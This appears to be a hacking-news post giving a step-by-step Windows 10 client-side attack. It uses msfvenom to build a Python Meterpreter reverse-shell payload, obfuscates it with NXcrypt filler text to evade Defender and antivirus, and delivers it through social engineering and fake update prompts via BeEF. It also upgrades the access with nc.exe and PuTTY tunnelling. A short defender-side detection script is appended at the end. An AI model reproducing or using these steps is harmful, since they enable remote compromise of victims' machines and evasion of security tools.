
Latest Hacking News.....

Wes Baker

Sharing a little Windows 10 client-side exploit today, which we came across recently and replicated fully in a lab. Machines: Windows 10, fully patched and with Defender enabled, plus tests with Kaspersky, McAfee, Symantec, Avira and others.


1.) Create payload

msfvenom --payload=python/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=YYYY --out=/var/www/html/evil.py


2.) "Encrypt" payload

./NXcrypt.py -f /var/www/html/evil.py -f /var/www/html/evil.py

Puts a lot of random novel book texts in between :)


3.) Then either convert the Python script to an exe with PyInstaller, or use a smart script which installs Python on the victim machine (downloading, installing, taking care of the interactive prompts) and runs the script. Deliver the payload via social engineering / update notification once hooked in BeEF.


4.) Multi Listener on server


5.) Meterpreter shell (only 16 out of 56 AV engines detect it). Windows Defender is bypassed and doesn't detect anything. Windows Defender also allows nc.exe to be downloaded and upgraded to Meterpreter as well. Windows Defender also allows PuTTY to be downloaded and used to facilitate the reverse shell through an intermediary via an SSH tunnel.
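A defender-side triage check for the padding described in step 2, as an added example that is not part of the original post or of NXcrypt. It assumes the filler prose has to sit in comments or string literals for the script to remain valid Python; the function names, thresholds and both sample inputs are constructed for illustration.

```python
import io
import re
import tokenize

PROSE_WORD = re.compile(r"^[A-Za-z']+[.,;:!?]?$")
DYNAMIC_EXEC = {"exec", "eval", "compile"}

def padding_profile(source):
    """Return (prose_ratio, dynamic_exec_names) for Python source text."""
    prose_chars = code_chars = 0
    dynamic = set()
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type in (tokenize.COMMENT, tokenize.STRING):
            # Only whitespace-separated plain words count, so an encoded blob
            # (one long token without spaces) is not mistaken for prose.
            words = [w for w in tok.string.strip("#'\"").split()
                     if PROSE_WORD.match(w)]
            if len(words) >= 5:  # assumed minimum for a "sentence"
                prose_chars += sum(len(w) for w in words)
        elif tok.type in (tokenize.NAME, tokenize.OP, tokenize.NUMBER):
            code_chars += len(tok.string)
            if tok.type == tokenize.NAME and tok.string in DYNAMIC_EXEC:
                dynamic.add(tok.string)
    total = prose_chars + code_chars
    return (prose_chars / total if total else 0.0), sorted(dynamic)

def looks_padded(source, min_ratio=0.6):
    """Triage flag: mostly prose AND uses exec/eval/compile (assumed rule)."""
    ratio, dynamic = padding_profile(source)
    return ratio >= min_ratio and bool(dynamic)

# Constructed samples: an ordinary module and a harmless padded script.
BENIGN = '''import json

def load(path):
    # Read the settings file.
    with open(path) as fh:
        return json.load(fh)
'''
PADDED = '''# The ferry left the harbour town before dawn and the fog had not lifted.
"Nobody in the village remembered when the old lighthouse had last been lit."
exec(compile("print(1)", "<sample>", "exec"))
"She closed the ledger and listened to the rain against the window pane."
'''

if __name__ == "__main__":
    for name, src in (("benign", BENIGN), ("padded", PADDED)):
        print(name, padding_profile(src), looks_padded(src))
```

Treat a hit as a reason to look closer rather than a verdict; the 0.6 ratio is an assumed starting point to tune against your own code base.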


